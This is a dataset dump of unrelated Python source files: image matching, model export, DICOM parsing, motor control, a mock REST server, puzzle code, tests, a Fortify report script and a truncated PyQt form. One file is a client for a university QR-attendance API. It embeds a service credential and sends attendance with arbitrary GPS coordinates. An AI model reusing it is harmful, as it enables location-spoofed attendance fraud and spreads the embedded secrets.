id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
1653533 | <filename>analyze/match.py
import sys
import matplotlib.pyplot as plt
import cv2 as cv
import numpy as np
fig, axes = plt.subplots(nrows=2, ncols=3, figsize=(9.3, 6), sharex=True, sharey=True)
fig.subplots_adjust(left=0.03, right=0.97, hspace=0.3, wspace=0.05)
ax = axes.ravel()
for a in ax.ravel():
a.axis('off')
a.set_aspect('equal')
# load test data
if len(sys.argv) > 2:
img1 = cv.imread(sys.argv[1], cv.IMREAD_GRAYSCALE)
img1 = cv.GaussianBlur(img1,(31,31),0)
img2 = cv.imread(sys.argv[2], cv.IMREAD_GRAYSCALE)
ax[0].imshow(img1, cmap=plt.cm.get_cmap(name="cividis"))
ax[0].set_title(sys.argv[1], fontdict={'fontsize': 11})
ax[1].imshow(img2, cmap=plt.cm.get_cmap(name="cividis"))
ax[1].set_title(sys.argv[2], fontdict={'fontsize': 11})
kernel = np.ones((9, 9), np.uint8)
ret, thresh = cv.threshold(cv.morphologyEx(img1, cv.MORPH_CLOSE, kernel), 127, 255, cv.THRESH_BINARY)
ret, thresh2 = cv.threshold(cv.morphologyEx(img2, cv.MORPH_CLOSE, kernel), 127, 255, cv.THRESH_BINARY)
# thresh1 = cv.morphologyEx(thresh, cv.MORPH_CLOSE, kernel)
# thresh2 = cv.morphologyEx(thresh2, cv.MORPH_CLOSE, kernel)
image, contours, hierarchy = cv.findContours(thresh, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
cnt1 = contours[0]
epsilon = 0.001*cv.arcLength(cnt1, False)
cnt1 = cv.approxPolyDP(cnt1, epsilon, False)
image, contours, hierarchy = cv.findContours(thresh2, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
cnt2 = contours[0]
epsilon = 0.001*cv.arcLength(cnt2, False)
cnt2 = cv.approxPolyDP(cnt2, epsilon, False)
ret = cv.matchShapes(cnt1,cnt2,1,0.0)
print("Similarity={:.2f}".format(1-ret))
poly1 = cnt1.reshape(-1,2)
ax[3].imshow(thresh, cmap=plt.cm.get_cmap(name="cividis"))
ax[3].plot(poly1[:, 0], poly1[:, 1], linewidth=4)
poly2 = cnt2.reshape(-1,2)
ax[4].imshow(thresh2, cmap=plt.cm.get_cmap(name="cividis"))
ax[4].plot(poly2[:, 0], poly2[:, 1], linewidth=4)
plt.show()
| StarcoderdataPython |
3220496 | <gh_stars>0
#!/usr/bin/env python3
# coding: utf-8
import argparse
import os.path
from torch.autograd import Variable
import torch.onnx
import sys
import os
import os.path as osp
sys.path.append(osp.dirname(osp.dirname(osp.abspath(__file__))))
from models.resnet50_unet_activation import UNetWithResnet50Encoder
from models.resnet50_unet_activation_DUA import UNetWithResnet50EncoderDUA
from models.resnet50_unet_activation_bilinear import UNetWithResnet50EncoderBi
from models.resnet50_unet_activation_drop import UNetWithResnet50Encoder_act_drop
from models.resnet50_unet_activation_no_bn import UNetWithResnet50Encoder_act_no_bn
from collections import OrderedDict
def fix_model_state_dict(state_dict):
new_state_dict = OrderedDict()
for k, v in state_dict['model_state'].items():
name = k
if name.startswith('module.'):
name = name[7:] # remove 'module.' of dataparallel
new_state_dict[name] = v
return new_state_dict
if __name__ == "__main__":
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--trained_model', '-tm', type=str, help='trained model',
default='./checkpoints/glare_bestmodel_35_11_train_37_28.pth')
parser.add_argument('--width', type=int, help='feature map width', default=3584)
parser.add_argument('--height', type=int, help='feature map height', default=2560)
parser.add_argument('--channel', type=int, help='feature map channel', default=3)
args = parser.parse_args()
model = UNetWithResnet50Encoder(n_classes=args.channel)
# load it
state_dict = torch.load(args.trained_model)
model.load_state_dict(fix_model_state_dict(state_dict))
x = Variable(torch.randn(1, args.channel, args.width, args.height))
input_names_ = ["data"]
output_names_ = ["pred"]
torch.onnx.export(model, x, os.path.splitext(
args.trained_model)[0] + '.onnx', verbose=True, input_names=input_names_, output_names=output_names_)
| StarcoderdataPython |
1647124 | <filename>posda/posdatools/python/posda/main/__init__.py
import sys
import json
import os
import subprocess
from ..util import md5sum
from ..util import printe
from .file import insert_file
def get_parameters():
test = sys.stdin.read()
return json.loads(test)
def get_stdin_input():
lines = []
for row in sys.stdin:
lines.append(row.strip())
return lines
#TODO: move these classes somwehre else.. maybe posda.compat?
# they aren't going to be used much, if at all..
class DicomFile:
def __init__(self, filename):
self.filename = filename
self.__parse(filename)
def __getitem__(self, index):
if isinstance(index, str):
# does it look like a tag?
if index.startswith("(") and index.endswith(")") and "," in index:
return self.get_by_tag(index)
else:
return self.get_by_name(index)
elif isinstance(index, tuple):
a, b = index
tag = "({0:04x},{1:04x})".format(a, b)
return self.get_by_tag(tag)
else:
raise RuntimeError("Not sure how to locate tag using a " +
str(type(index)))
def get_by_tag(self, tag):
return DicomTag(self.by_tag[tag])
def get_by_name(self, name):
return DicomTag(self.by_desc[name])
def __parse(self, filename):
self.stat = os.stat(filename)
self.md5sum = md5sum(filename)
proc = subprocess.run(['./dicom_dump.sh', filename],
stdout=subprocess.PIPE)
lines = proc.stdout.decode().split('\n')
by_tag = {}
by_desc = {}
for line in lines:
try:
tag, vr, desc, *rest = line.split(':')
except:
continue
value = ':'.join(rest)
t = (tag, vr, desc, value)
by_tag[tag] = t
by_desc[desc] = t
self.by_tag = by_tag
self.by_desc = by_desc
class DicomTag:
def __init__(self, init_tuple):
self.tag_name, self.vr, self.name, self._value = init_tuple
self._init_value()
def _init_value(self):
v = self._value
# TODO: this is hacky, for now assume anything surrounded in
# quotes is a string and drop the quotes
# THIS WILL BREAK if a value legitiamtely has quotes around it!
if v.startswith('"') and v.endswith('"'):
v = v[1:-1]
if "\\" in v:
v = v.split("\\")
self.value = v
def __repr__(self):
return f"<DicomTag: {self.name} = {self.value}>"
def __str__(self):
return str(self.value)
def __unicode__(self):
return self.__str__()
| StarcoderdataPython |
9617112 | <filename>interfearence_hardware/src/interfearence_hardware/odrive_interface.py
import odrive
from odrive.enums import *
from odrive.utils import dump_errors
import time
class OdriveInterface:
def __init__(self):
# CONSTANTS
self.MIN_MOTOR_RADS = 104 # So min wheel speed is ~50 RPM
self.MAX_MOTOR_RADS = 471 # So max wheel speed is ~200 RPM
self.MAX_EFFORT = 20
# Encoder counts per radian the MOTOR has turned
self.ENCODER_COUNTS_PER_RAD = 4000 / (2 * 3.1415926)
# Encoder counts from the wheels
self._encoder_counts = [0, 0]
# Find the Odrive - block until received
print("\033[1;31mWaiting for Odrive...\033[0m")
self._odrv = odrive.find_any()
print("\033[1;32m...Found Odrive\033[0m")
# Do initial callibration
self._odrv.axis0.requested_state = AXIS_STATE_FULL_CALIBRATION_SEQUENCE
self._odrv.axis1.requested_state = AXIS_STATE_FULL_CALIBRATION_SEQUENCE
while (self._odrv.axis0.current_state != AXIS_STATE_IDLE and
self._odrv.axis1.current_state != AXIS_STATE_IDLE):
time.sleep(0.1)
if self._odrv.axis0.error != 0x00 or self._odrv.axis1.error != 0x00:
dump_errors(self._odrv, True)
raise RuntimeError("Failed to calibrate axis")
# Set ourselves to the reset state
self.reset();
# Ensure that we're in velocity control
self._odrv.axis0.controller.config.control_mode = CTRL_MODE_VELOCITY_CONTROL
self._odrv.axis1.controller.config.control_mode = CTRL_MODE_VELOCITY_CONTROL
self._ctrl_modes = [CTRL_MODE_VELOCITY_CONTROL,
CTRL_MODE_VELOCITY_CONTROL]
# Set reset state, where motors are un-powered
def reset(self):
self._odrv.axis0.requested_state = AXIS_STATE_IDLE
self._odrv.axis1.requested_state = AXIS_STATE_IDLE
self._odrv.axis0.controller.vel_setpoint = 0
self._odrv.axis1.controller.vel_setpoint = 0
self.clear_errors()
# Release the odrive from reset, powering on the motors
def release_reset(self):
# Prepare for new match
self._odrv.axis0.encoder.shadow_count = 0
self._odrv.axis1.encoder.shadow_count = 0
self._odrv.axis0.requested_state = AXIS_STATE_CLOSED_LOOP_CONTROL
self._odrv.axis1.requested_state = AXIS_STATE_CLOSED_LOOP_CONTROL
# Read the wheel velocity in radians per second
def get_wheel_vel(self, axis, dt):
old_encoder_counts = self._encoder_counts[axis]
if axis == 0:
self._encoder_counts[axis] = self._odrv.axis0.encoder.shadow_count
else:
self._encoder_counts[axis] = self._odrv.axis1.encoder.shadow_count
delta = self._encoder_counts[axis] - old_encoder_counts
wheel_vel = delta / (dt * self.ENCODER_COUNTS_PER_RAD * 20)
return wheel_vel
# Set the wheel velocity in radians per second
def set_wheel_vel(self, axis, vel):
# Convert wheel velocity into motor velocity
vel *= 20
if vel < self.MIN_MOTOR_RADS:
vel = 0
elif vel > self.MAX_MOTOR_RADS:
vel = self.MAX_MOTOR_RADS
if self._ctrl_modes[axis] != CTRL_MODE_VELOCITY_CONTROL:
self._ctrl_modes[axis] = CTRL_MODE_VELOCITY_CONTROL
if axis == 0:
self._odrv.axis0.controller.config.control_mode = CTRL_MODE_VELOCITY_CONTROL
else:
self._odrv.axis1.controller.config.control_mode = CTRL_MODE_VELOCITY_CONTROL
if axis == 0:
self._odrv.axis0.controller.vel_setpoint = vel * self.ENCODER_COUNTS_PER_RAD
else:
self._odrv.axis1.controller.vel_setpoint = vel * self.ENCODER_COUNTS_PER_RAD
# Read the battery voltage
def get_battery_voltage(self):
return self._odrv.vbus_voltage
# Set the effort(current) applied to the wheel
def set_wheel_eff(self, axis, eff):
if eff > self.MAX_EFFORT:
eff = self.MAX_EFFORT
elif eff < -self.MAX_EFFORT:
eff = -self.MAX_EFFORT
if self._ctrl_modes[axis] != CTRL_MODE_CURRENT_CONTROL:
self._ctrl_modes[axis] = CTRL_MODE_CURRENT_CONTROL
if axis == 0:
self._odrv.axis0.controller.config.control_mode = CTRL_MODE_CURRENT_CONTROL
else:
self._odrv.axis1.controller.config.control_mode = CTRL_MODE_CURRENT_CONTROL
if axis == 0:
self._odrv.axis0.controller.current_setpoint = eff
else:
self._odrv.axis1.controller.current_setpoint = eff
# Read the effort(current) applied to the wheel
def get_wheel_eff(self, axis):
B = 0
C = 0
if axis == 0:
B = self._odrv.axis0.motor.current_meas_phB
C = self._odrv.axis0.motor.current_meas_phC
else:
B = self._odrv.axis1.motor.current_meas_phB
C = self._odrv.axis1.motor.current_meas_phC
if abs(B) > abs(C):
return B
return C
def check_errors(self):
if self._odrv.axis0.error != 0x00:
return True
if self._odrv.axis1.error != 0x00:
return True
return False
def clear_errors(self):
dump_errors(self._odrv, True)
| StarcoderdataPython |
1829857 | <reponame>zmaktouf/restsim
from flask import Flask, request, make_response, jsonify
from functools import wraps
import os
import json
app = Flask(__name__)
g_data_cache={}
g_data_args_cache={}
DATA_CACHE = 1
ARGS_CACHE = 2
def _get_data(path, cachetype=DATA_CACHE):
global g_data_cache
global g_data_args_cache
cache = g_data_cache if cachetype==DATA_CACHE else g_data_args_cache
ext = ".json" if cachetype==DATA_CACHE else ".args.json"
try:
if path not in cache:
source="data/"+path+ext
print "Loading ressource ", source
with open(source, 'r') as fd :
cache[path]=json.load(fd)
return cache[path]
except:
return {}
def _validate_params(args, path):
expected = _get_data(path, ARGS_CACHE)
result = cmp(args,expected)==0
print "_validate_params returns ", result
if not result:
print "expected: ", expected
print "received: ", args
return result
def _check_auth(username, password):
return username == 'admin' and password == '<PASSWORD>'
def _authenticate():
return make_response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not _check_auth(auth.username, auth.password):
return _authenticate()
return f(*args, **kwargs)
return decorated
@app.route("/<path:path>", methods=['GET'])
@requires_auth
def endpoint_ressource(path):
print path
response = None
valid = _validate_params(request.args.to_dict(), path)
if valid:
payload=_get_data(path)
if payload:
response = make_response(json.dumps(payload), 200)
response.headers['Content-Type'] = 'application/json'
return response
response = make_response(jsonify({"errorCode": 4001, "errorMessage": "Ressource not found" if valid else "Invalid parameters"}), 404)
response.headers['Content-Type'] = 'application/json'
return response
if __name__ == "__main__":
app.secret_key = os.urandom(12)
app.run(debug=True, host='0.0.0.0', port=4000) | StarcoderdataPython |
9786126 | """Some useful tools."""
from ..errors import AsinNotFoundException
import re
def get_asin(text: str) -> str:
"""Returns the ASIN from a given text. Raises AsinNotFoundException on fail."""
# Return if text is an ASIN
if re.search(r'^[A-Z0-9]{10}$', text):
return text
# Extract ASIN from URL searching for alphanumeric and 10 digits
asin = re.search(r'(dp|gp/product|gp/aw/d|dp/product)/([a-zA-Z0-9]{10})', text)
if asin:
return asin.group(2)
else:
raise AsinNotFoundException('Asin not found: ' + text)
| StarcoderdataPython |
8004458 |
def clean_groups():
groups = []
f = open('day6.txt','r')
data =f.readlines()
group = ''
for d in data:
d = d[0:len(d)-1]
group += ' ' + d
if d == '':
groups.append(group)
group = ''
return groups
def count_uinique_answers_part1(groups):
total_count = 0
for g in groups:
g = g.replace(' ','')
answers = list(g)
answers.sort()
answers = set(answers)
total_count += len(answers)
return total_count
def count_uinique_answers_part2(groups):
total_count = 0
for g in groups:
answers = g.split()
total_count += find_duplicates(answers)
#print(answers, total_count)
return total_count
def find_duplicates(group):
if len(group) == 1:
return len(list(group[0]))
intersect = group[0]
for i,d in enumerate(group):
intersect = set(group[i]).intersection(intersect)
#print(intersect)
return len(intersect)
groups = clean_groups()
total1 = count_uinique_answers_part1(groups)
total2 = count_uinique_answers_part2(groups)
print(f'Part 1: {total1}')
print(f'Part 2: {total2}')
| StarcoderdataPython |
11237894 | <filename>tests/tests/models/test_file.py
import os
from app.models import FileExample
from paper_uploads.models import UploadedFile
from ..dummy import *
from .test_dummy import (
TestFileFieldResource,
TestFileFieldResourceAttach,
TestFileFieldResourceDelete,
TestFileFieldResourceEmpty,
TestFileFieldResourceRename,
)
class TestUploadedFile(TestFileFieldResource):
resource_url = '/media/files/%Y-%m-%d'
resource_location = 'files/%Y-%m-%d'
resource_name = 'Nature Tree'
resource_extension = 'Jpeg'
resource_size = 672759
resource_checksum = 'e3a7f0318daaa395af0b84c1bca249cbfd46b9994b0aceb07f74332de4b061e1'
owner_app_label = 'app'
owner_model_name = 'fileexample'
owner_fieldname = 'file'
owner_class = FileExample
file_field_name = 'file'
@classmethod
def init_class(cls, storage):
storage.resource = UploadedFile(
owner_app_label=cls.owner_app_label,
owner_model_name=cls.owner_model_name,
owner_fieldname=cls.owner_fieldname
)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp)
storage.resource.save()
yield
storage.resource.delete_file()
storage.resource.delete()
def test_get_file_folder(self, storage):
assert storage.resource.get_file_folder() == self.resource_location
def test_display_name(self, storage):
assert storage.resource.display_name == self.resource_name
def test_as_dict(self, storage):
assert storage.resource.as_dict() == {
'id': 1,
'name': self.resource_name,
'extension': self.resource_extension,
'size': self.resource_size,
'file_info': '(Jpeg, 672.8\xa0KB)',
'url': storage.resource.get_file_url(),
'created': storage.resource.created_at.isoformat(),
'modified': storage.resource.modified_at.isoformat(),
'uploaded': storage.resource.uploaded_at.isoformat(),
}
class TestUploadedFileAttach(TestFileFieldResourceAttach):
resource_class = UploadedFile
class TestUploadedFileRename(TestFileFieldResourceRename):
resource_class = UploadedFile
resource_location = 'files/%Y-%m-%d'
owner_app_label = 'app'
owner_model_name = 'fileexample'
owner_fieldname = 'file'
@classmethod
def init_class(cls, storage):
storage.resource = cls.resource_class(
owner_app_label=cls.owner_app_label,
owner_model_name=cls.owner_model_name,
owner_fieldname=cls.owner_fieldname
)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_name.jpg')
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.old_source_path = file.path
storage.resource.rename_file('new_name.png')
yield
os.remove(storage.old_source_path)
storage.resource.delete_file()
storage.resource.delete()
class TestUploadedFileDelete(TestFileFieldResourceDelete):
resource_class = UploadedFile
resource_location = 'files/%Y-%m-%d'
owner_app_label = 'app'
owner_model_name = 'fileexample'
owner_fieldname = 'file'
@classmethod
def init_class(cls, storage):
storage.resource = cls.resource_class(
owner_app_label=cls.owner_app_label,
owner_model_name=cls.owner_model_name,
owner_fieldname=cls.owner_fieldname
)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_name.jpg')
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.old_source_path = file.path
storage.resource.delete_file()
yield
storage.resource.delete()
class TestUploadedFileEmpty(TestFileFieldResourceEmpty):
recource_class = UploadedFile
class TestUploadedFileExists:
@staticmethod
def init_class(storage):
storage.resource = UploadedFile(
owner_app_label='app',
owner_model_name='fileexample',
owner_fieldname='file'
)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp)
storage.resource.save()
yield
try:
storage.resource.delete_file()
except ValueError:
pass
storage.resource.delete()
def test_files(self, storage):
source_path = storage.resource.path
assert os.path.exists(source_path) is True
storage.resource.delete_file()
assert os.path.exists(source_path) is False
| StarcoderdataPython |
5114481 | import base64
import random
import string
import requests
class SimasterQrPresence:
BASIC_AUTH_KEY = 'integrasiPresensiQR:serv1CEintegrasi-Pre$en$iGHQR'
SIMASTER_URL = 'https://simaster.ugm.ac.id'
LOGIN_URL = f'{SIMASTER_URL}/services/simaster/service_login'
COMMIT_DEVICE_URL = f'{SIMASTER_URL}/services/simaster/commit_device'
QRP_TOKEN_REQUEST_URL = f'{SIMASTER_URL}/services/presensiqr/request_token'
QRP_SCAN_URL = f'{SIMASTER_URL}/services/presensiqr/doscanent'
QRP_AUTH_HEADER = {
'Authorization': f'Basic {base64.b64encode(BASIC_AUTH_KEY.encode()).decode()}'}
HEADERS = {
'UGMFWSERVICE': '1',
'User-Agent': 'Praesentia/1.0.0'
}
def __init__(self, a_id=None):
self.a_id = a_id if a_id else self._generate_random_a_id()
self.logged_in = False
self.session_id = None
self.account_data = {}
self.session = requests.Session()
self.session.headers.update(self.HEADERS)
def login(self, username, password):
req = self.session.post(self.LOGIN_URL, data={
'aId': self.a_id,
'username': username,
'password': password,
})
if req.status_code != 200:
return False
self.logged_in = True
data = req.json()
self.session_id = data['sesId']
self.group_id = data['groupMenu']
self.account_data['name'] = data['namaLengkap']
self.account_data['group'] = data['groupMenuNama']
self.account_data['id'] = data['userTipeNomor']
return self._commit_device()
def send_qr_presence(self, qr_data, lat, long):
token = self._request_token()
if not token:
return None
data = self.session.post(self.QRP_SCAN_URL, headers={**self.QRP_AUTH_HEADER},
data={
token['token']: token['value'],
'device': self.session_id,
'group': self.group_id,
'code': qr_data,
'latitudeGps': lat,
'longitudeGps': long,
}).json()
return data['status'], data['heading'], data['message']
def _commit_device(self):
if not self.logged_in:
return False
req = self.session.post(self.COMMIT_DEVICE_URL, data={
'sesId': self.session_id
})
return req.status_code == 200
def _request_token(self):
if not self.logged_in:
return {}
req = self.session.get(self.QRP_TOKEN_REQUEST_URL, headers={
**self.QRP_AUTH_HEADER
})
if not req.status_code == 200:
return {}
return req.json()
@staticmethod
def _generate_random_a_id():
return ''.join(random.choice(string.hexdigits) for _ in range(16)).lower()
| StarcoderdataPython |
1762986 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import datetime
from SSCClient.core import SSCClient
from SSCClient.utils import func_extract_all_project_names
from collections import defaultdict
if __name__ == "__main__":
ssc_client = SSCClient("https://192.168.1.1/ssc")
# ssc_client.set_auth_token("<KEY>")
ssc_client.set_auth_cookie("E58BC67EEB87A6BAFE32778A2C9CB395")
project_version_mapping = ssc_client.func_get_project_version_dict()
id_list = []
print("project,version,critical,high,medium,low,noOfFiles, totalLOC,execLOC,elapsedTime,lastScanData")
for project_info, version_list in project_version_mapping.items():
for version_info in version_list:
version_id = version_info.id
id_list.append(version_id)
# 获取扫描结果
r = ssc_client.func_get_issue_count_by_id(version_id=version_id, showsuppressed="true", showhidden="true")
if len(r) == 0:
print("{},{},,,,,,,,,".format(project_info.name, version_info.name))
continue
scan_result = defaultdict(int)
for _ in r:
scan_result[_['id']] = _['totalCount']
# 获取最后一次扫描任务执行信息
start = 0
while True:
r = ssc_client.func_get_artifact_info(version_id, start)
if r[0]['_embed']['scans'][0] is None:
start += 1
continue
noOfFiles = r[0]['_embed']['scans'][0]['noOfFiles']
totalLOC = r[0]['_embed']['scans'][0]['totalLOC']
execLOC = r[0]['_embed']['scans'][0]['execLOC']
elapsedTime =r[0]['_embed']['scans'][0]['elapsedTime']
tmp = elapsedTime.split(':')
if len(tmp) == 2:
elapsedTime = datetime.timedelta(minutes=float(elapsedTime.split(':')[0]), seconds=float(elapsedTime.split(':')[1]))
if len(tmp) == 3:
elapsedTime = datetime.timedelta(hours=float(elapsedTime.split(':')[0]), minutes=float(elapsedTime.split(':')[1]), seconds=float(elapsedTime.split(':')[2]))
lastScanData = r[0]['lastScanDate']
lastScanData = datetime.datetime.strptime(lastScanData.split('.')[0], "%Y-%m-%dT%H:%M:%S")
print("{},{},{},{},{},{},".format(project_info.name, version_info.name, scan_result['Critical'], scan_result['High'],scan_result['Medium'], scan_result['Low']),end='')
print("{},{},{},{},{}".format(noOfFiles, totalLOC, execLOC, elapsedTime.total_seconds(), lastScanData))
break
# 为用户增加访问project version的权限
username = "firstname2"
for version_id in id_list:
ssc_client.func_suppress_all_issues_by_folder(2, "Low")
# ssc_client.func_add_ladpuser_to_projectverion_by_user_name(version_id, username) | StarcoderdataPython |
4987581 | import pandas
import random
import collections
MALE = 0
FEMALE = 1
# This life table actually comes from
# https://www.kitces.com/joint-life-expectancy-and-mortality-calculator/
# However, upon closer inspection, the numbers don't match up with the
# numbers from the 2004 Period Life Table, so I'm not sure what the source
# is. In general, the numbers here are more grim. e.g. for a 90-year old
# male is says the Death Probability is .181789 but the actual 2004
# Period Life Table says it is only 0.155383
HULSTROM = 'mortality/hultstrom-lifetable.csv'
# This is *actual* 2004 life table. (I think.)
# The top level index is at http://www.cdc.gov/nchs/products/life_tables.htm
NVSS_2004 = 'mortality/2004-life-table.csv'
# And an updated 2011 version
NVSS_2011 = 'mortality/2011-life-table.csv'
# The Annuity 2000 life table is different yet again. (It will give even longer
# life spans than the 2004 life table.) The difference is because Annuity 2000
# applies a 10% "loading factor" to try to account for the fact that people who
# buy annuities live longer than people who don't. This is probably the best
# one to use for most testing.
#
# The source was randomly Googled.
ANNUITY_2000 = 'mortality/annuity-2000.csv'
def make_mortality(csv_filename):
life = pandas.read_csv(csv_filename)
def survive(age, gender):
''' Given an age and a gender, return True if they survive
to their next birthday. '''
key = {
MALE: "Male Death Probability",
FEMALE : "Female Death Probability"
}[gender]
return random.random() > life.iloc[age][key]
return survive
Person = collections.namedtuple("Person", "age gender")
def gen_lifespan(people, survival_fn=None):
""" People is a an array of Persons which are just a tuple of age and gender
[ (age, gender), (age, gender), ...]
This allows us to check for same-sex couples,
couples with different ages, and so on easily
"""
if not survival_fn:
survival_fn = make_mortality(ANNUITY_2000)
def g(year, people, survival_fn):
if len(people) == 0:
return year
else:
new_people = [person for person in people if survival_fn(person.age + year, person.gender)]
return g(year+1, new_people, survival_fn)
return g(0, people, survival_fn)
DEFAULT_COUPLE = [Person(age=65, gender=MALE), Person(age=63, gender=FEMALE)]
SINGLE_MALE = [Person(age=65, gender=MALE)]
def make_mortality_rate(source=ANNUITY_2000):
life = pandas.read_csv(source)
def f(age, gender):
key = {
MALE: "Male Death Probability",
FEMALE : "Female Death Probability"
}[gender]
return life.iloc[age][key]
return f
def life_expectancy(male_age, female_age):
"""
Passing in None instead of an age calculates single life
expectancy
"""
life = pandas.read_csv(ANNUITY_2000)
def alive_at_age(gender, age):
key = {
MALE: "Male Lives",
FEMALE : "Female Lives"
}[gender]
return life.iloc[age][key]
def T(gender, age):
""" Sum up all of the years lived by people alive in this cohort """
sum = 0
for i in range(116-age):
sum += alive_at_age(gender, age + i)
return sum
if male_age and female_age:
raise NotImplementedError
# Doing this is wrong. This just creates a blended population.
# I looked at what aacalc does and...it seems too complex. There must be a simpler solution to this.
#return (T(MALE, male_age) + T(FEMALE, female_age)) / (alive_at_age(MALE, male_age) + alive_at_age(FEMALE, female_age))
elif male_age:
return T(MALE, male_age) / alive_at_age(MALE, male_age)
else:
return T(FEMALE, female_age) / alive_at_age(FEMALE, female_age)
| StarcoderdataPython |
6644383 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'dockWindowa.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(420, 666)
Form.setMinimumSize(QtCore.QSize(0, 0))
Form.setMaximumSize(QtCore.QSize(420, 16777215))
Form.setLayoutDirection(QtCore.Qt.RightToLeft)
Form.setStyleSheet("#Form{background-color:#4683ff ;}")
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setContentsMargins(10, 10, 10, 10)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox = QtWidgets.QGroupBox(Form)
self.groupBox.setStyleSheet("QGroupBox{background-color:#ffffff;border:none;border-radius:5px;}")
self.groupBox.setTitle("")
self.groupBox.setObjectName("groupBox")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.groupBox)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setSpacing(0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setContentsMargins(-1, 0, -1, -1)
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.groupBox_3 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_3.setMaximumSize(QtCore.QSize(150, 16777215))
self.groupBox_3.setStyleSheet("QGroupBox{border-radius:0px;background-color:#4683ff;}")
self.groupBox_3.setTitle("")
self.groupBox_3.setObjectName("groupBox_3")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.groupBox_3)
self.verticalLayout_4.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.groupBox_4 = QtWidgets.QGroupBox(self.groupBox_3)
self.groupBox_4.setStyleSheet("QGroupBox{background-color:#ffffff;border-top-left-radius:10px;border-top-right-radius:5px;}")
self.groupBox_4.setTitle("")
self.groupBox_4.setObjectName("groupBox_4")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.groupBox_4)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.label = QtWidgets.QLabel(self.groupBox_4)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName("label")
self.verticalLayout_5.addWidget(self.label)
self.verticalLayout_4.addWidget(self.groupBox_4)
self.horizontalLayout.addWidget(self.groupBox_3)
self.groupBox_2 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_2.setStyleSheet("QGroupBox{border-radius:0px;background-color:#4683ff;border-bottom-right-radius:15px;}")
self.groupBox_2.setTitle("")
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.groupBox_2)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_2 = QtWidgets.QLabel(self.groupBox_2)
self.label_2.setText("")
self.label_2.setObjectName("label_2")
self.verticalLayout_3.addWidget(self.label_2)
self.horizontalLayout.addWidget(self.groupBox_2)
self.verticalLayout_2.addLayout(self.horizontalLayout)
self.groupBox_35 = QtWidgets.QGroupBox(self.groupBox)
self.groupBox_35.setMinimumSize(QtCore.QSize(400, 0))
self.groupBox_35.setMaximumSize(QtCore.QSize(400, 16777215))
self.groupBox_35.setStyleSheet("QGroupBox{background-color:#ffffff;border:none;border-radius:5px;}\n"
"QListWidget {background-color: #ffffff;\n"
"outline: none;\n"
"border:0px;\n"
"border-radius:5px;\n"
"show-decoration-selected: 1}\n"
"QListWidget:item {background-color:#f6fafd;}\n"
"QListWidget::item:selected {background-color: transparent;}")
self.groupBox_35.setTitle("")
self.groupBox_35.setObjectName("groupBox_35")
self.formLayout = QtWidgets.QFormLayout(self.groupBox_35)
self.formLayout.setHorizontalSpacing(20)
self.formLayout.setVerticalSpacing(10)
self.formLayout.setObjectName("formLayout")
self.label2 = QtWidgets.QLabel(self.groupBox_35)
self.label2.setStyleSheet("QLabel{color:#4683ff;}")
self.label2.setObjectName("label2")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label2)
self.labeloth = QtWidgets.QLabel(self.groupBox_35)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labeloth.sizePolicy().hasHeightForWidth())
self.labeloth.setSizePolicy(sizePolicy)
self.labeloth.setMaximumSize(QtCore.QSize(16777215, 16777215))
font = QtGui.QFont()
font.setPointSize(10)
self.labeloth.setFont(font)
self.labeloth.setStyleSheet("QLabel{background-color:#f6fafd;}")
self.labeloth.setAlignment(QtCore.Qt.AlignCenter)
self.labeloth.setObjectName("labeloth")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.labeloth)
self.label7 = QtWidgets.QLabel(self.groupBox_35)
self.label7.setStyleSheet("QLabel{color:#4683ff;}")
self.label7.setObjectName("label7")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label7)
self.labelanemia = QtWidgets.QLabel(self.groupBox_35)
